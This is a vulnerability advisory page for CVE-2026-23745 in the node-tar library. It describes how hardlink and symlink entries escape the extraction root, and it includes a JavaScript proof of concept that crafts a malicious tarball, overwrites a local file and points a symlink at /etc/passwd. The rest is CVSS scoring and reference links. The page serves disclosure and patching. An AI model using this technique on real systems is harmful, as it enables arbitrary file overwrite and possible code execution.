Staging Environment: Content and features may be unstable or change without notice.
Search for vulnerabilities
Vulnerability details: VCID-yy79-dbn9-7bd5
Vulnerability ID VCID-yy79-dbn9-7bd5
Aliases CVE-2026-23745
GHSA-8qq5-rm4j-mr97
Summary node-tar is Vulnerable to Arbitrary File Overwrite and Symlink Poisoning via Insufficient Path Sanitization ### Summary The `node-tar` library (`<= 7.5.2`) fails to sanitize the `linkpath` of `Link` (hardlink) and `SymbolicLink` entries when `preservePaths` is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to **Arbitrary File Overwrite** via hardlinks and **Symlink Poisoning** via absolute symlink targets. ### Details The vulnerability exists in `src/unpack.ts` within the `[HARDLINK]` and `[SYMLINK]` methods. **1. Hardlink Escape (Arbitrary File Overwrite)** The extraction logic uses `path.resolve(this.cwd, entry.linkpath)` to determine the hardlink target. Standard Node.js behavior dictates that if the second argument (`entry.linkpath`) is an **absolute path**, `path.resolve` ignores the first argument (`this.cwd`) entirely and returns the absolute path. The library fails to validate that this resolved target remains within the extraction root. A malicious archive can create a hardlink to a sensitive file on the host (e.g., `/etc/passwd`) and subsequently write to it, if file permissions allow writing to the target file, bypassing path-based security measures that may be in place. **2. Symlink Poisoning** The extraction logic passes the user-supplied `entry.linkpath` directly to `fs.symlink` without validation. This allows the creation of symbolic links pointing to sensitive absolute system paths or traversing paths (`../../`), even when secure extraction defaults are used. ### PoC The following script generates a binary TAR archive containing malicious headers (a hardlink to a local file and a symlink to `/etc/passwd`). It then extracts the archive using standard `node-tar` settings and demonstrates the vulnerability by verifying that the local "secret" file was successfully overwritten. ```javascript const fs = require('fs') const path = require('path') const tar = require('tar') const out = path.resolve('out_repro') const secret = path.resolve('secret.txt') const tarFile = path.resolve('exploit.tar') const targetSym = '/etc/passwd' // Cleanup & Setup try { fs.rmSync(out, {recursive:true, force:true}); fs.unlinkSync(secret) } catch {} fs.mkdirSync(out) fs.writeFileSync(secret, 'ORIGINAL_DATA') // 1. Craft malicious Link header (Hardlink to absolute local file) const h1 = new tar.Header({ path: 'exploit_hard', type: 'Link', size: 0, linkpath: secret }) h1.encode() // 2. Craft malicious Symlink header (Symlink to /etc/passwd) const h2 = new tar.Header({ path: 'exploit_sym', type: 'SymbolicLink', size: 0, linkpath: targetSym }) h2.encode() // Write binary tar fs.writeFileSync(tarFile, Buffer.concat([ h1.block, h2.block, Buffer.alloc(1024) ])) console.log('[*] Extracting malicious tarball...') // 3. Extract with default secure settings tar.x({ cwd: out, file: tarFile, preservePaths: false }).then(() => { console.log('[*] Verifying payload...') // Test Hardlink Overwrite try { fs.writeFileSync(path.join(out, 'exploit_hard'), 'OVERWRITTEN') if (fs.readFileSync(secret, 'utf8') === 'OVERWRITTEN') { console.log('[+] VULN CONFIRMED: Hardlink overwrite successful') } else { console.log('[-] Hardlink failed') } } catch (e) {} // Test Symlink Poisoning try { if (fs.readlinkSync(path.join(out, 'exploit_sym')) === targetSym) { console.log('[+] VULN CONFIRMED: Symlink points to absolute path') } else { console.log('[-] Symlink failed') } } catch (e) {} }) ``` ### Impact * **Arbitrary File Overwrite:** An attacker can overwrite any file the extraction process has access to, bypassing path-based security restrictions. It does not grant write access to files that the extraction process does not otherwise have access to, such as root-owned configuration files. * **Remote Code Execution (RCE):** In CI/CD environments or automated pipelines, overwriting configuration files, scripts, or binaries leads to code execution. (However, npm is unaffected, as it filters out all `Link` and `SymbolicLink` tar entries from extracted packages.)
Status Published
Exploitability 0.5
Weighted Severity 8.0
Risk 4.0
Affected and Fixed Packages Package Details
Weaknesses (3)
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CWE-937 OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities
CWE-1035 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
System Score Found at
cvssv3 8.2 https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23745.json
epss 7e-05 https://api.first.org/data/v1/epss?cve=CVE-2026-23745
epss 7e-05 https://api.first.org/data/v1/epss?cve=CVE-2026-23745
epss 7e-05 https://api.first.org/data/v1/epss?cve=CVE-2026-23745
epss 7e-05 https://api.first.org/data/v1/epss?cve=CVE-2026-23745
epss 7e-05 https://api.first.org/data/v1/epss?cve=CVE-2026-23745
epss 7e-05 https://api.first.org/data/v1/epss?cve=CVE-2026-23745
epss 7e-05 https://api.first.org/data/v1/epss?cve=CVE-2026-23745
cvssv3.1 7.5 https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
cvssv3.1_qr HIGH https://github.com/advisories/GHSA-8qq5-rm4j-mr97
cvssv4 8.2 https://github.com/isaacs/node-tar
generic_textual HIGH https://github.com/isaacs/node-tar
cvssv4 8.2 https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e
generic_textual HIGH https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e
ssvc Track https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e
cvssv3.1_qr HIGH https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97
cvssv4 8.2 https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97
generic_textual HIGH https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97
ssvc Track https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97
cvssv4 8.2 https://nvd.nist.gov/vuln/detail/CVE-2026-23745
generic_textual HIGH https://nvd.nist.gov/vuln/detail/CVE-2026-23745
Reference id Reference type URL
https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23745.json
https://api.first.org/data/v1/epss?cve=CVE-2026-23745
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23745
https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
https://github.com/isaacs/node-tar
https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e
https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97
https://nvd.nist.gov/vuln/detail/CVE-2026-23745
2430538 https://bugzilla.redhat.com/show_bug.cgi?id=2430538
GHSA-8qq5-rm4j-mr97 https://github.com/advisories/GHSA-8qq5-rm4j-mr97
RHSA-2026:2144 https://access.redhat.com/errata/RHSA-2026:2144
RHSA-2026:2900 https://access.redhat.com/errata/RHSA-2026:2900
RHSA-2026:2926 https://access.redhat.com/errata/RHSA-2026:2926
RHSA-2026:3782 https://access.redhat.com/errata/RHSA-2026:3782
RHSA-2026:6192 https://access.redhat.com/errata/RHSA-2026:6192
No exploits are available.
Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H Found at https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23745.json
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N Found at https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none
Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N Found at https://github.com/isaacs/node-tar
Attack Vector (AV) Attack Complexity (AC) Attack Requirements (AT) Privileges Required (PR) User Interaction (UI) Vulnerable System Impact Confidentiality (VC) Vulnerable System Impact Integrity (VI) Vulnerable System Impact Availability (VA) Subsequent System Impact Confidentiality (SC) Subsequent System Impact Integrity (SI) Subsequent System Impact Availability (SA)

network

adjacent

local

physical

low

high

none

present

none

low

high

none

passive

active

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none
Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N Found at https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e
Attack Vector (AV) Attack Complexity (AC) Attack Requirements (AT) Privileges Required (PR) User Interaction (UI) Vulnerable System Impact Confidentiality (VC) Vulnerable System Impact Integrity (VI) Vulnerable System Impact Availability (VA) Subsequent System Impact Confidentiality (SC) Subsequent System Impact Integrity (SI) Subsequent System Impact Availability (SA)

network

adjacent

local

physical

low

high

none

present

none

low

high

none

passive

active

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none
Vector: SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-20T14:52:52Z/ Found at https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e
Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N Found at https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97
Attack Vector (AV) Attack Complexity (AC) Attack Requirements (AT) Privileges Required (PR) User Interaction (UI) Vulnerable System Impact Confidentiality (VC) Vulnerable System Impact Integrity (VI) Vulnerable System Impact Availability (VA) Subsequent System Impact Confidentiality (SC) Subsequent System Impact Integrity (SI) Subsequent System Impact Availability (SA)

network

adjacent

local

physical

low

high

none

present

none

low

high

none

passive

active

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none
Vector: SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-20T14:52:52Z/ Found at https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97
Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N Found at https://nvd.nist.gov/vuln/detail/CVE-2026-23745
Attack Vector (AV) Attack Complexity (AC) Attack Requirements (AT) Privileges Required (PR) User Interaction (UI) Vulnerable System Impact Confidentiality (VC) Vulnerable System Impact Integrity (VI) Vulnerable System Impact Availability (VA) Subsequent System Impact Confidentiality (SC) Subsequent System Impact Integrity (SI) Subsequent System Impact Availability (SA)

network

adjacent

local

physical

low

high

none

present

none

low

high

none

passive

active

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none

high

low

none
Exploit Prediction Scoring System (EPSS)
Percentile 0.00523
EPSS Score 7e-05
Published At April 2, 2026, 12:55 p.m.
Date Actor Action Source VulnerableCode Version
2026-04-01T12:52:28.799264+00:00 GithubOSV Importer Import https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-8qq5-rm4j-mr97/GHSA-8qq5-rm4j-mr97.json 38.0.0